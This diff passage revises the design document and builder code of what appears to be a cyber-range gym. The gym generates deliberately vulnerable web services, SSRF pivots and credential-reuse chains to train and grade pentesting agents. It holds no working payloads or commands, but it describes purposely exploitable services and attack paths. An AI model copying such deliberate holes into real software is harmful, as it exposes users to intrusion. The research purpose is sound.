+  become observable, so file-read and code-exec consequences light up — rung 4 is gated by
+  this backing ([#252](https://github.com/vecna-labs/open-range/issues/252)); until it
+  lands the verifier works at rungs 1–3.
 
 ### 8.5 Generation ≠ finding — why a mediocre builder is enough
 
-Producing software with real flaws is an easier, *different* competence than
-finding them (the generator/discriminator gap GANs and self-play exploit). A
-mediocre LLM writing a webapp leaks genuine bugs it never intended; finding those
-is real skill, uncorrelated with the builder's own finding ability. **The catch:**
-this only holds for *emergent* bugs. The moment we plant a catalog class the bug is
-not emergent and the ceiling is the catalog again. So the two modes coexist by
-design:
+Producing software with real flaws is an easier, *different* competence than finding them
+(the generator/discriminator gap GANs and self-play exploit). A mediocre LLM writing a
+webapp leaks genuine bugs it never intended; finding those is real skill, uncorrelated with
+the builder's own finding ability. The catch: this holds only for *emergent* bugs — the
+moment we plant a catalog class the bug is not emergent and the ceiling is the catalog
+again. So the two modes coexist by design:
 
 | mode | proof | reproducible? | ceiling | role |
 | --- | --- | --- | --- | --- |
 | **planted** | construction + flag-match | fully (seed) | catalog | the controlled H2 **measurement** axis |
 | **emergent** | consequence verification (8.3) | via build-time freeze | generated-software diversity | the ceiling-raising **research** axis |
 
-The consequence verifier (8.3) is what *unifies* them: planted mode checks "the
-planted value leaked," emergent mode checks "any hidden value leaked," same
-function. Emergent mode is a real departure from §3's plant-by-construction and is
-the new work; planted mode stays exactly as it is, because the study needs a
-reproducible, known-ground-truth axis to measure transfer against. An LLM in the
-build path trades pure seed-determinism for **generate-verify-freeze**: generate
-once, verify by consequence, freeze to a content-addressed snapshot — the study
-reads frozen worlds, so reproducibility holds.
+Emergent mode is a real departure from §3's plant-by-construction and is the new work;
+planted mode stays exactly as it is, because the study needs a reproducible,
+known-ground-truth axis to measure transfer against. The consequence verifier unifies them
+— planted mode checks "the planted value leaked," emergent mode checks "any hidden value
+leaked," same function. An LLM in the build path
+trades pure seed-determinism for **generate-verify-freeze**: generate once, verify by
+consequence, freeze to a content-addressed snapshot — the study reads frozen worlds, so
+reproducibility holds.
 
 ### 8.6 Where the reward and the trainer live — the boundary
 
-The gym builds, admits, and verifies worlds; it **never runs the agent or the RL
-loop**. So:
+The gym builds, admits, and verifies worlds; it **never runs the agent or the RL loop.**
 
-- **Gym (this pack):** the verdict surface — `check_success` and its generalization
-  (8.3), the report-vs-graph check (rung 2), the graph-wide invariant callables
-  `Ontology.validate` already accepts. This is the verifiable reward *source*.
+- **Gym (this pack):** the verdict surface — `check_success` and its consequence
+  generalization (8.3), the report-vs-graph check (rung 2), the graph-wide invariant
+  callables `Ontology.validate` accepts. This is the verifiable reward *source*.
 - **Trainer (`openrange_trl`, the consumer):** GRPO itself. GRPO removes the *value
   network*, not the reward — its judge-free property comes from the reward being
   *verifiable* (DeepSeek-R1-Zero: GRPO + rule reward, no critic, no reward model).
-  The gym supplies that verifiable reward; the trainer computes group-relative
-  advantage. `test_trl_cyber.py` already wires this: the world's held-out verdict,
-  graded over HTTP, is the reward, and GRPO needs only that different actions earn
-  different grades.
+  `test_trl_cyber.py` wires this: the world's held-out verdict, graded over HTTP, is the
+  reward; the trainer computes group-relative advantage.
 
-On reward *shape*: GRPO needs variance within a group, and a binary leak/no-leak
-signal is sparse. The pentest verdict already returns **three rungs**
-(`reached_endpoint → extracted_anything → matched_flag`, all graph-observable) —
-that graded surface is the variance GRPO learns from, and it generalizes with 8.3.
-(The exploit chain can densify further as potential-based shaping, but shaping
-toward the *planted* chain biases against novel paths — use it for the
-`easy`/bootstrapping tier, drop it when chasing emergent findings.)
-
-Keeping GRPO in the trainer and the verdict in the gym is not pedantry — putting
-rollout/eval in the gym is the category error this project has hit before.
+GRPO needs variance within a group, and a binary leak/no-leak signal is sparse. The
+pentest verdict already returns **three graded rungs** (`reached_endpoint →
+extracted_anything → matched_flag`, all graph-observable) — that surface is the variance
+GRPO learns from, and it generalizes with the spine (§8.3). (Potential-based shaping toward the *planted* chain biases against novel
+paths — use it for the `easy` tier, drop it when chasing emergent findings.) Putting
+rollout/eval in the gym is the category error to avoid.
 
 ### 8.7 So who sets the ceiling
 
-Not the builder's finding ability (generation ≠ finding). Not the judge (mechanize
-below it, rungs 1–4). The ceiling is **the diversity of software the generator can
-emit × the expressiveness of the consequences and invariants we instrument** — both
-higher and more honest limits than "a mediocre LLM" or "a judge's taste." The
-co-evolution is productive because of the asymmetry: bugs are *easy to make*, *hard
-to find*, *cheap to confirm once reached*, so generator and agent climb together
-without either being a great vuln-hunter. The genuine frontier limit is a novel
-*class* — a consequence type never instrumented; you cannot confirm a violation of
-a property you never stated. That is real and far-off: consequence instrumentation
-reaches novel *instances and chains* of known property-violations (most of real
-pentesting); new categories stay human-seeded. A fine place for the wall.
+Not the builder's finding ability (generation ≠ finding). Not the judge (mechanize below
+it, rungs 1–4). The ceiling is **the diversity of software the generator can emit × the
+expressiveness of the consequences and invariants we instrument.** The co-evolution is
+productive because of the asymmetry: bugs are *easy to make*, *hard to find*, *cheap to
+confirm once reached*, so generator and agent climb together without either being a great
+vuln-hunter. The genuine frontier limit is a novel *class* — a consequence type never
+instrumented; you cannot confirm a violation of a property you never stated. That is real
+and far-off: consequence instrumentation reaches novel *instances and chains* of known
+property-violations (most of real pentesting); new categories stay human-seeded.
 
-### 8.8 What the indictment experiment showed
+### 8.8 The admission gap
 
-A one-off experiment (2026-06-11, scaffolding not kept) validated a consequence verifier
-against known-good worlds, then used it to audit 89 LLM-generated worlds (world + solver
-+ self-checker) across four classes, guided and unguided. The durable finding: the
-self-check is a strong, necessary filter — it catches the dominant failure, *unsolvable*
-worlds — but leaves a small, consistent tail (**~2–4% of shipped worlds**) that it passes
-and an independent verifier rejects as trivial or unfaithful. The tail did not widen with
-harder classes, bigger N, or real LLM checkers. The genuinely hard part is the independent
-verifier itself: it mis-fires in both directions, and the reliable signals are
-**triviality** and **faked-engine**, not the generator's own wrong-vector. The tail still
-matters — a `command_injection` set even 2% arbitrary-file-read biases a per-class transfer
-number — which is the verifier's job to measure.
-
-### 8.9 State of this direction
-
-Built and validated on all 9 classes: the any-hidden-leak verifier (rungs 1+3 of the
-spine, `consequence.py`), wired into live `check_success` via runtime leak-capture; graded
-reward rungs for GRPO; the LLM kept strictly off the correctness path. Still ahead: the LLM
-generating the *world* itself (emergent mode, 8.5); report↔graph checks (rung 2, designed);
-execution-effect consequences (rung 4, blocked on the container,
-[#252](https://github.com/vecna-labs/open-range/issues/252)); novel-class discovery
-(far-future, human-seeded, 8.7).
+An independent consequence verifier, run against LLM-generated worlds (world + solver +
+self-checker; 89 audited across four classes, guided and unguided), shows the durable shape
+of generate-then-verify: the self-check is a strong,
+necessary filter — it catches the dominant failure, *unsolvable* worlds — but leaves a
+small, consistent tail (**~2–4% of shipped worlds**) that it passes and an independent
+verifier rejects as trivial or unfaithful. The tail does not widen with harder classes or
+real LLM checkers. The genuinely hard part is the independent verifier itself: it mis-fires
+in both directions, and the reliable signals are **triviality** and **faked-engine**, not
+the generator's own claimed wrong-vector. The tail still matters — a `command_injection` set
+even 2% arbitrary-file-read biases a per-class transfer number, which is the verifier's job
+to measure.
 
 ---
 
-## 9. Scaling up: LLM-realized services on the procedural graph
+## 9. LLM-realized services on the procedural graph
 
-§8 built the *verifier*. This is what it unlocks: stop templating worlds and let an
-LLM **realize** them — keeping procedural as the architect and the verifier as the
-gate, at rising realism.
+§8 builds the verifier; this is what it unlocks — stop templating worlds and let an LLM
+**realize** them, keeping procedural as the architect and the verifier as the gate, at
+rising realism. The invariant at every stage:
 
-The invariant at every stage: **procedural architects the graph** (topology, flag
-placement, the solvability skeleton — the controllable, scalable, solvable-by-
-construction part that is OpenRange's differentiator); **the LLM realizes each node**
-into a real, varied service; **admission verifies** (the consequence oracle + the
-shortcut/faithfulness probes of §8.8) that the realization is still solvable and not
-*trivially* so; **the result freezes** to a content-addressed snapshot, so the study
-stays reproducible even with an LLM in the build path.
+- **procedural architects the graph** — topology, flag placement, the solvability skeleton:
+  the controllable, scalable, solvable-by-construction part that is OpenRange's
+  differentiator;
+- **the LLM realizes each node** into a real, varied service;
+- **admission verifies** (the consequence oracle + the shortcut/faithfulness probes of §8.8)
+  that the realization is still solvable and not *trivially* so;
+- **the result freezes** to a content-addressed snapshot, so the study stays reproducible
+  even with an LLM in the build path.
 
-Why the mix, not pure-LLM: an LLM asked for "a vulnerable world" gives *one* world,
-low controllability, and — §8.8 measured this — mostly *broken* ones. The procedural
-engine is the controllable variation source; the LLM is realism *per node, behind
-admission*. The LLM never architects correctness.
+An LLM asked for "a vulnerable world" gives *one* world, low controllability, and mostly
+*broken* ones (§8.8). The procedural engine is the controllable variation source; the LLM is
+realism *per node, behind admission*, and never architects correctness. Each stage adds
+realism over the last, and is the sim-to-real progression (`PROCESS` → `CONTAINER` →
+cluster) the study measures on:
 
-Each stage adds realism over the last; each is tracked by its own issue:
-
-| the LLM realizes | runtime | tracked in |
+| the LLM realizes | runtime | issue |
 | --- | --- | --- |
-| a vuln *handler* — varied implementations within a class, admission-gated by running the exploit | `PROCESS` (today) | [#260](https://github.com/vecna-labs/open-range/issues/260) |
-| a node as a real **container** — real fs/shell, so file-read / RCE actually execute | `Backing.CONTAINER` | [#252](https://github.com/vecna-labs/open-range/issues/252) (hardening: [#265](https://github.com/vecna-labs/open-range/issues/265)) |
+| a vuln *handler* — varied implementations within a class, admission-gated by running the exploit | `PROCESS` | [#260](https://github.com/vecna-labs/open-range/issues/260) |
+| a node as a real **container** — real fs/shell, so file-read / RCE actually execute | `Backing.CONTAINER` | [#252](https://github.com/vecna-labs/open-range/issues/252) ([#265](https://github.com/vecna-labs/open-range/issues/265)) |
 | **multiple** networked services; graph edges become real links — SSRF→internal, pivot, credential reuse | containers + net | [#212](https://github.com/vecna-labs/open-range/issues/212), [#235](https://github.com/vecna-labs/open-range/issues/235) |
-| a **k8s** topology — pods/services/network-policies/RBAC; lateral movement + k8s-native classes (RBAC escalation, SA-token theft, netpol bypass, pod escape) | Kind | [#189](https://github.com/vecna-labs/open-range/issues/189) |
+| a **k8s** topology — pods / services / network-policies / RBAC; lateral movement + k8s-native classes | Kind | [#189](https://github.com/vecna-labs/open-range/issues/189) |
 
-The first stage ([#260](https://github.com/vecna-labs/open-range/issues/260)) is the
-realization *primitive* every later one builds on: the **dynamic admission gate** —
-render the LLM's realization, run the intended exploit, confirm the flag leaks via
-`consequence.detect_leak`, confirm a benign request does *not* — is what makes letting
-an LLM write the world safe. (Today's admission is *structural* — a graph-path check;
-an LLM realization needs *dynamic* admission, because the code might be wrong.)
-Exec-effect faithfulness rides the container sandbox
-([#202](https://github.com/vecna-labs/open-range/issues/202)). This is also the
-sim-to-real progression (`PROCESS` → `CONTAINER` → cluster) the study measures on.
+The first stage (#260) is the realization *primitive* every later one builds on: the
+**dynamic admission gate** — render the LLM's realization, run the intended exploit, confirm
+the flag leaks via `consequence.detect_leak`, confirm a benign request does *not*. (Today's
+structural admission is a graph-path check; an LLM realization needs *dynamic* admission,
+because the code might be wrong.)
 
-**Container backing — status.** It runs the *one* generated multi-service app (not a
-bespoke app per class). The container sets `OPENRANGE_REALFS`, which flips the rendered
-app's surfaces from in-memory emulation to the real container; `PROCESS` leaves it unset
-and stays byte-for-byte the emulation. **file_read** (path_traversal, xxe) becomes real
-with zero handler changes — the `files` surface is a real filesystem (`_RealFiles`, a real
-`open()` per path), so a traversal escape is real OS path resolution. **code_exec**
-command_injection runs a real `sh -c` (the §6 mutually-exclusive contexts preserved by the
-same naive per-context filter, now over a real shell). Both are proven live by docker-gated,
-context-parametrized tests. The world container — which now runs real RCE — is contained
-with dropped capabilities + no-new-privileges + memory/cpu/pid caps (`hardening_run_args`,
-verified live: `CapEff` all-zero inside, still exploitable under the flags).
+### The container backing
 
-This is wired as a real runtime: `ContainerWebappRuntime` runs the world as a container
-that episodes actually use, selected by `Backing.CONTAINER`. It reuses the subprocess
-runtime (`docker run` is the supervised child), resolves the published host port with
-`docker port`, and reads the leak signal out of the running container. The load-bearing
-check is **cross-backing parity**: the same snapshot + same exploit grades *identically*
-on `PROCESS` and `CONTAINER` — only fidelity changes, not the task surface. Scope: one
-container for the whole world; many per-service containers on a real network is the
-networked-services work ([#212](https://github.com/vecna-labs/open-range/issues/212) /
-[#235](https://github.com/vecna-labs/open-range/issues/235)).
+The `CONTAINER` backing runs the one generated app (not a bespoke app per class). It sets
+`OPENRANGE_REALFS`, which flips the rendered app's surfaces from in-memory emulation to the
+real container; `PROCESS` leaves it unset and stays byte-for-byte the emulation:
 
-The rest is tracked in [#265](https://github.com/vecna-labs/open-range/issues/265):
-read-only-rootfs, egress policy, flag-out-of-image, and ssti real (unsandboxed eval).
+- **file_read** (path_traversal, xxe) becomes real with zero handler changes — the `files`
+  surface is a real filesystem (`_RealFiles`, a real `open()` per path), so a traversal
+  escape is real OS path resolution.
+- **code_exec** command_injection runs a real `sh -c`, the §6 mutually-exclusive contexts
+  preserved by the same naive per-context filter over a real shell.
 
-**Two environments, not one (the world vs. the agent).** A generated world is the
-*target* the agent attacks, reached only over its HTTP surface (`base_url`); the agent
-never runs inside it. So the world image carries only what its OWN behavior needs: when a
-vuln runs a real OS command server-side — command_injection shelling out to a diagnostic
-tool like `ping`/`nslookup` — that tool is installed in the target container *because the
-server runs it*, and only in worlds that actually have that vuln (`required_apt_packages`
-in `container.py`; a file-read-only world installs nothing). A world is not a toolbox: we
-do not preinstall recon/exploit tooling "for the agent." The attacking agent is a separate
-environment the harness brings — its own sandbox (workspace = `solver_root`, its own
-tools), hitting the world only over the network. Hardening the world container that now
-runs real RCE (resource/privilege limits, egress, flag-out-of-image) is
-[#265](https://github.com/vecna-labs/open-range/issues/265); sandboxing the `exec`'d
-*verifier source* is the separate, host-side
+`ContainerWebappRuntime` is the runtime episodes use, selected by `Backing.CONTAINER`: it
+reuses the subprocess runtime (`docker run` is the supervised child), resolves the host port
+with `docker port`, and reads the leak signal out of the running container. The world
+container that runs attacker code is contained — capabilities dropped, no-new-privileges,
+memory/cpu/pid caps (`hardening_run_args`, `CapEff` all-zero inside yet still exploitable).
+The load-bearing check is **cross-backing parity**: the same snapshot + same exploit grades
+*identically* on `PROCESS` and `CONTAINER` — only fidelity changes, not the task surface.
+Remaining container hardening (read-only rootfs, egress policy, flag-out-of-image, unsandboxed
+ssti) is [#265](https://github.com/vecna-labs/open-range/issues/265); sandboxing the `exec`'d
+verifier source is the separate, host-side
 [#202](https://github.com/vecna-labs/open-range/issues/202).
+
+### Two environments, not one
+
+A generated world is the *target* the agent attacks over its HTTP surface (`base_url`); the
+agent never runs inside it. So the world image carries only what its OWN behavior needs:
+when a vuln runs a real OS command server-side (command_injection shelling to `ping` /
+`nslookup`), that tool is installed *because the server runs it*, and only in worlds with
+that vuln (`required_apt_packages`; a file-read-only world installs nothing). A world is not
+a toolbox — recon/exploit tooling lives in the attacking agent's own sandbox (`solver_root`),
+which the harness brings, hitting the world only over the network.
+
+---
 
 ## 10. Networked multi-service: real network position
 
-The single-container backing (§9) runs the whole world in one container, every service
-mounted by path prefix — so "internal" services are just `/svc/<name>` paths on the same
-server and SSRF is emulated in-process. This stage makes network position **real**.
-
-**The shape.** A real SSRF world is: a **public** service (the agent's only entry,
-published) holds the SSRF; an **internal** service (no published port, reachable only on
-the container network) holds the flag. The flag is reachable **only** by pivoting — the
-agent exploits the SSRF to make the public service fetch the internal service's URL,
-which returns the flag. Genuine networked exploitation, not a path lookup.
-
-**How it works.**
+The single-container backing (§9) mounts every service by path prefix on one server, so
+"internal" services are just `/svc/<name>` paths and SSRF is emulated in-process. This stage
+makes network position **real**: a **public** service (the agent's only entry, published)
+holds the SSRF; an **internal** service (no published port, reachable only on the container
+network) holds the flag. The flag is reachable **only** by pivoting — the agent exploits the
+SSRF to make the public service fetch the internal service's URL.
 
 - **Per-service realization** (`realize_services`) splits the world into one container per
-  `service` node, each carrying only its own endpoints and the state of the data_stores it
-  is `backed_by`. The flag stays in its owning internal service and never enters the public
-  image.
-- **The networked runtime** (`NetworkedContainerWebappRuntime`) runs those containers on a
-  real docker network, each reachable by name, publishing only the public service. The leak
-  signal aggregates across every service's request log, so the internal service detects
-  itself serving its own flag. `WebappPack.realize` routes here when a world is networked-
-  shaped (`_is_networked`).
-- **Generation** re-homes the SSRF onto the public service's endpoint and adds the internal
-  half — a `metadata_credential_leak` endpoint that serves the flag, which the SSRF
-  `enables`. Feasibility and entrypoint selection follow that pivot, so the agent starts at
-  the public endpoint and the internal flag service counts as reachable.
-- **The exploit is real.** Under `OPENRANGE_NETWORKED` the SSRF handler `urlopen`s the
-  internal host across the network. Docker-gated tests recover the flag only through the
-  pivot (a benign fetch and a direct hit on the internal path leak nothing) and confirm the
-  same exploit grades identically on `PROCESS` (in-process read) and the networked
-  `CONTAINER` (real fetch) — only fidelity changes.
+  `service` node, each carrying only its own endpoints and the state of the data_stores it is
+  `backed_by`. The flag stays in its owning internal service and never enters the public image.
+- **The networked runtime** (`NetworkedContainerWebappRuntime`) runs those containers on a real
+  docker network, each reachable by name, publishing only the public service. The leak signal
+  aggregates across every service's request log. `WebappPack.realize` routes here when a world
+  is networked-shaped (`_is_networked`).
+- **Generation** re-homes the SSRF onto the public endpoint and adds the internal half — a
+  `metadata_credential_leak` endpoint serving the flag, which the SSRF `enables`; feasibility
+  and entrypoint selection follow that pivot.
+- **The exploit is real.** Under `OPENRANGE_NETWORKED` the SSRF handler `urlopen`s the internal
+  host across the network. Docker-gated tests recover the flag only through the pivot (a benign
+  fetch and a direct hit on the internal path leak nothing) and confirm the same exploit grades
+  identically on `PROCESS` (in-process read) and the networked `CONTAINER` (real fetch) — only
+  fidelity changes.
 
-Later: real lateral movement / credential reuse, then enterprise scale (#212) + lazy
-realization (#235) on this runtime, then k8s (#189).
+---
 
-## 11. Company worlds: a believable multi-service estate
+## 11. Company worlds and synthesized credential chains
 
-§10 made network position real for a hand-shaped pair — one public service, one
-internal flag-bearer. A real target is not two services; it is a small company's
-estate, and the interesting part of the attack is finding the way in. This stage grows
-the generator from that pair to a believable medium-size company the agent recons and
-pivots through. It stays **fully realized** — every service is a real container —
-because the point right now is a stable world good enough to train an agent on. Spinning
-up only what the agent can reach (#235) is a later step, deferred on purpose until this
-ground is solid.
+A real target is not a hand-shaped pair of services; it is a small company's estate, and the
+interesting part of the attack is finding the way in. This stage grows the generator to a
+believable medium-size company the agent recons and pivots through — opt-in and additive (the
+direct-pivot worlds of §10 are untouched), fully realized (lazy realization #235 is deferred
+until this ground is stable).
 
-**The shape.** Procedural architects a coherent estate:
+**The shape.** Procedural architects a coherent estate: a public `web` portal in the `dmz`,
+and internal services on a separate segment (`api`, `auth`, one or more `db` — one bears the
+flag) plus off-path decoys, so the agent has to tell signal from noise. Names, hosts, and
+accounts are realistic (curated pools, §2); the internal services are unpublished real
+containers, reached only by name. The agent recons an over-sharing config endpoint for the
+internal hostnames, then drives the public SSRF to fetch one across the network. A benign
+internal fetch leaks nothing.
 
-- a public `web` portal in the `dmz` the agent enters;
-- internal services on a separate segment — `api`, `auth`, one or more `db` (one bears
-  the flag behind an internal metadata-style endpoint) — plus ordinary internal services
-  that are *not* on the path, so the estate is believable and the agent has to tell
-  signal from noise;
-- real hosts, zones, and `connected_to` wiring. "Internal" is already a real network
-  position — the networked runtime runs each service as its own container and leaves
-  the internal ones unpublished, reachable only by name, not a path prefix on one
-  server. The dmz/internal zone split is graph-level today (one docker network);
-  enforcing it as real per-zone isolation rides the later network work.
+**Synthesized credential chains.** The richest worlds, and the first *composed* rather than
+hand-shaped. The SSRF gains an opt-in *proxy* mode — the agent drives the pivot to any
+internal host by name (a real `urlopen` on `CONTAINER`; the same in-process `/svc/<host>`
+dispatch on `PROCESS`, so parity holds). On it the engine **synthesizes** a credential-reuse
+chain of *sampled depth* from one composable primitive: an entry host leaks a db credential,
+each gated host validates the credential leaked one hop back and relays the next, the last
+serves the flag — so one preset yields 1-, 2-, 3-hop chains, a distribution not a fixed shape.
+The flag is reachable ONLY through the final gate: the db record's value is a decoy, the real
+flag lives in the gated secret. That composable hop is the action a search-based sampler
+([#193](https://github.com/vecna-labs/open-range/issues/193)) composes and scores — the
+substrate for "synthesize, don't hand-shape."
 
-**The way in.** The flag sits on the internal metadata service, reachable only by
-pivoting from the public entry. The agent recons the public service — an over-sharing
-config disclosure names the internal metadata host and path — then drives the public
-service's SSRF to fetch that host across the network and read the flag. The pivot rides
-the §10 mechanic unchanged: the filter bypass is still the puzzle, the published service
-is the only entry, and the internal flag host is one of several the agent could aim at,
-so finding the right one is part of the work. A benign internal fetch leaks nothing.
-
-**Why procedural still owns it.** Topology, zones, flag placement, and the
-solvable-by-construction pivot stay procedural — the controllable, admission-checked
-part. Per-node realism (LLM-realized handlers, #260) and the consequence verifier ride
-on top unchanged. Feasibility already proves the flag reachable across services by
-following the SSRF `enables` chain (`_enable_closure`); cross-backing parity (`PROCESS`
-vs the networked `CONTAINER`) stays the load-bearing check — only fidelity changes, not
-the task.
-
-**Lateral movement: a synthesized credential chain (built on this ground).** The richest
-worlds this unlocks — and the first that are *composed* rather than hand-shaped. The SSRF
-gains an opt-in *proxy* mode: the agent drives the pivot — bypass the scheme filter to
-make the public service fetch ANY internal host by name and forward the path and query,
-so the internal estate is the agent's to explore (a real `urlopen` on the container
-backing; the same in-process `/svc/<host>` dispatch on `PROCESS`, so parity still holds).
-On top of it the engine **synthesizes** a credential-reuse chain of *sampled depth* from
-one composable primitive: an entry host leaks a db credential, each gated host validates
-the credential leaked one hop back and relays the next, and the last serves the flag. One
-preset therefore synthesizes 1-, 2-, 3-hop chains across seeds — a distribution, not a
-fixed shape. The flag is reachable ONLY through the final gate — the db record's value is
-a decoy and the real flag sits in the gated secret — so no default endpoint and no
-un-credentialed request can leak it. Genuine host-to-host lateral movement, the project's
-stated stage after §10; opt-in and additive (the direct-pivot worlds are untouched). The
-composable hop is exactly the action a search-based sampler (#193) would compose and
-score — the substrate for "synthesize, don't hand-shape."
-
-**What comes next, on this ground.** Graph-driven lazy realization (#235) once worlds
-outgrow what is cheap to fully realize; then k8s (#189).
+Correctness is as in §2–§3: procedural owns topology, flag placement, and the
+solvable-by-construction chain; feasibility proves reachability across services
+(`_enable_closure`); cross-backing parity stays the load-bearing check. The next stages on
+this ground are enterprise scale
+([#212](https://github.com/vecna-labs/open-range/issues/212)) via graph-driven lazy
+realization ([#235](https://github.com/vecna-labs/open-range/issues/235)), then k8s
+([#189](https://github.com/vecna-labs/open-range/issues/189)).

--- a/packs/cyber_webapp/DESIGN.md
+++ b/packs/cyber_webapp/DESIGN.md
@@ -606,3 +606,60 @@ which returns the flag. Genuine networked exploitation, not a path lookup.
 
 Later: real lateral movement / credential reuse, then enterprise scale (#212) + lazy
 realization (#235) on this runtime, then k8s (#189).
+
+## 11. Company worlds: a believable multi-service estate
+
+§10 made network position real for a hand-shaped pair — one public service, one
+internal flag-bearer. A real target is not two services; it is a small company's
+estate, and the interesting part of the attack is finding the way in. This stage grows
+the generator from that pair to a believable medium-size company the agent recons and
+pivots through. It stays **fully realized** — every service is a real container —
+because the point right now is a stable world good enough to train an agent on. Spinning
+up only what the agent can reach (#235) is a later step, deferred on purpose until this
+ground is solid.
+
+**The shape.** Procedural architects a coherent estate:
+
+- a public `web` portal in the `dmz` the agent enters;
+- internal services on a separate segment — `api`, `auth`, one or more `db` (one bears
+  the flag behind an internal metadata-style endpoint) — plus ordinary internal services
+  that are *not* on the path, so the estate is believable and the agent has to tell
+  signal from noise;
+- real hosts, zones, and `connected_to` wiring. "Internal" is already a real network
+  position — the networked runtime runs each service as its own container and leaves
+  the internal ones unpublished, reachable only by name, not a path prefix on one
+  server. The dmz/internal zone split is graph-level today (one docker network);
+  enforcing it as real per-zone isolation rides the later network work.
+
+**The way in.** The flag sits on the internal metadata service, reachable only by
+pivoting from the public entry. The agent recons the public service — an over-sharing
+config disclosure names the internal metadata host and path — then drives the public
+service's SSRF to fetch that host across the network and read the flag. The pivot rides
+the §10 mechanic unchanged: the filter bypass is still the puzzle, the published service
+is the only entry, and the internal flag host is one of several the agent could aim at,
+so finding the right one is part of the work. A benign internal fetch leaks nothing.
+
+**Why procedural still owns it.** Topology, zones, flag placement, and the
+solvable-by-construction pivot stay procedural — the controllable, admission-checked
+part. Per-node realism (LLM-realized handlers, #260) and the consequence verifier ride
+on top unchanged. Feasibility already proves the flag reachable across services by
+following the SSRF `enables` chain (`_enable_closure`); cross-backing parity (`PROCESS`
+vs the networked `CONTAINER`) stays the load-bearing check — only fidelity changes, not
+the task.
+
+**Lateral movement: credential reuse (built on this ground).** The richest chain this
+unlocks. The SSRF gains an opt-in *proxy* mode: the agent drives the pivot — bypass the
+scheme filter to make the public service fetch ANY internal host by name and forward the
+path and query, so the internal estate is the agent's to explore (a real `urlopen` on
+the container backing; the same in-process `/svc/<host>` dispatch on `PROCESS`, so parity
+still holds). An internal service leaks a db credential and how to use it; an
+internal db gates the flag behind that reused credential. The flag is reachable ONLY
+through the gate — the db record's own value is a decoy and the real flag sits in the
+gated secret, so neither the db's default endpoints nor a request without the credential
+can leak it. The agent recons the estate, pivots to the metadata host, then reuses the
+credential it found to open the db on a *different* host: genuine host-to-host lateral
+movement, the project's stated stage after §10. Opt-in and additive — the direct-pivot
+worlds above are untouched.
+
+**What comes next, on this ground.** Graph-driven lazy realization (#235) once worlds
+outgrow what is cheap to fully realize; then k8s (#189).

--- a/packs/cyber_webapp/cyber_webapp/builder.py
+++ b/packs/cyber_webapp/cyber_webapp/builder.py
@@ -45,24 +45,50 @@ class WebappBuilder(ProceduralBuilder):
         # configurable without a hand-built PackPrior, while staying
         # deterministic: the seed still selects within the overridden ranges
         # and weights. ``scale`` feeds count_ranges; ``loot_shapes`` /
-        # ``vuln_kinds`` feed kind_weights.
+        # ``vuln_kinds`` feed kind_weights; ``company`` seeds a believable
+        # multi-service estate, itself still overridable.
         base = self.prior if self.prior is not None else default_prior()
+        lateral = bool(manifest.get("lateral_movement"))
+        company = bool(manifest.get("company")) or lateral
         scale = manifest.get("scale")
         weight_keys = [k for k in ("loot_shapes", "vuln_kinds") if k in manifest]
-        if not isinstance(scale, Mapping) and not weight_keys:
+        if not company and not isinstance(scale, Mapping) and not weight_keys:
             return base
         topology = dict(base.topology)
+        count_ranges = dict(topology.get("count_ranges") or {})
+        kind_weights = dict(topology.get("kind_weights") or {})
+        if company:
+            # A medium-company estate the agent recons and pivots through: more
+            # services. ``service_count`` / ``vuln_count`` are tunable (a manifest
+            # ``scale`` still wins below); the recon disclosure and the internal/dmz
+            # segmentation are added by the sampler off ``preset``. ``lateral_movement``
+            # swaps the direct pivot for a credential-reuse chain (the SSRF proxy +
+            # an internal credential leak gating the flag on a separate internal db).
+            topology["preset"] = "company"
+            if lateral:
+                topology["lateral"] = True
+            count_ranges.setdefault("service_count", {"min": 6, "max": 8})
+            count_ranges.setdefault("vuln_count", {"min": 3, "max": 6})
         if isinstance(scale, Mapping):
-            count_ranges = dict(topology.get("count_ranges") or {})
             for key, spec in scale.items():
                 if isinstance(spec, Mapping):
                     count_ranges[str(key)] = dict(spec)
-            topology["count_ranges"] = count_ranges
         if weight_keys:
-            kind_weights = dict(topology.get("kind_weights") or {})
             for key in weight_keys:
                 spec = manifest[key]
                 if isinstance(spec, Mapping):
                     kind_weights[key] = {str(k): v for k, v in spec.items()}
+        if company:
+            # The networked SSRF pivot to a db-backed internal flag IS the company
+            # world's shape, not a tunable weight: force it last so a stray
+            # ``vuln_kinds`` / ``loot_shapes`` override can't quietly yield a
+            # non-networked or unsolvable "company" world. ssrf wins the oracle slot
+            # (the only response-leak match for db loot, whatever its weight); the
+            # file-read decoys are noise.
+            kind_weights["loot_shapes"] = {"db": 1, "file": 0}
+            kind_weights["vuln_kinds"] = {"ssrf": 1, "path_traversal": 3, "xxe": 2}
+        if count_ranges:
+            topology["count_ranges"] = count_ranges
+        if kind_weights:
             topology["kind_weights"] = kind_weights
         return dataclasses.replace(base, topology=topology)

--- a/packs/cyber_webapp/cyber_webapp/sampling.py
+++ b/packs/cyber_webapp/cyber_webapp/sampling.py
@@ -144,6 +144,21 @@ _CORP_DOMAINS: tuple[str, ...] = (
 )
 _HOST_ENVS: tuple[str, ...] = ("prod", "stg", "infra")
 
+# Realistic people for the background accounts (DESIGN.md §2: `alice@corp.example`),
+# assigned deterministically and qualified with the world's corp domain.
+_PERSON_HANDLES: tuple[str, ...] = (
+    "alice.chen",
+    "brian.okafor",
+    "carla.diaz",
+    "devin.patel",
+    "erin.walsh",
+    "felix.nardi",
+    "grace.kim",
+    "hana.suzuki",
+    "ivan.petrov",
+    "julia.ross",
+)
+
 
 # Realistic service names by kind, sampled deterministically so a world reads like a
 # real company's estate rather than ``api1`` / ``db2`` (DESIGN.md §2: realism is
@@ -548,7 +563,7 @@ def sample_graph(
         attrs={"field": "value"},
     )
 
-    _sample_accounts(graph, rng, prior)
+    _sample_accounts(graph, rng, prior, corp_domain)
     _sample_vulnerabilities(
         graph,
         rng,
@@ -698,19 +713,22 @@ def _sample_accounts(
     graph: WorldGraph,
     rng: random.Random,
     prior: PackPrior | None,
+    corp_domain: str,
 ) -> None:
-    # Accounts are tagged ``Role.NPC``: they aren't the agent; they're
-    # background identities the realized world is seeded with.
+    # Accounts are tagged ``Role.NPC``: they aren't the agent; they're background
+    # identities the realized world is seeded with. Names are real people at the
+    # company domain (deterministic, no rng draw) rather than admin / user1.
     count = _sample_int(rng, prior, "account_count")
     for i in range(count):
         is_admin = i == 0
         account_id = f"acct_{i}"
+        handle = _PERSON_HANDLES[i % len(_PERSON_HANDLES)]
         graph.add_node(
             Node(
                 id=account_id,
                 kind="account",
                 attrs={
-                    "username": "admin" if is_admin else f"user{i}",
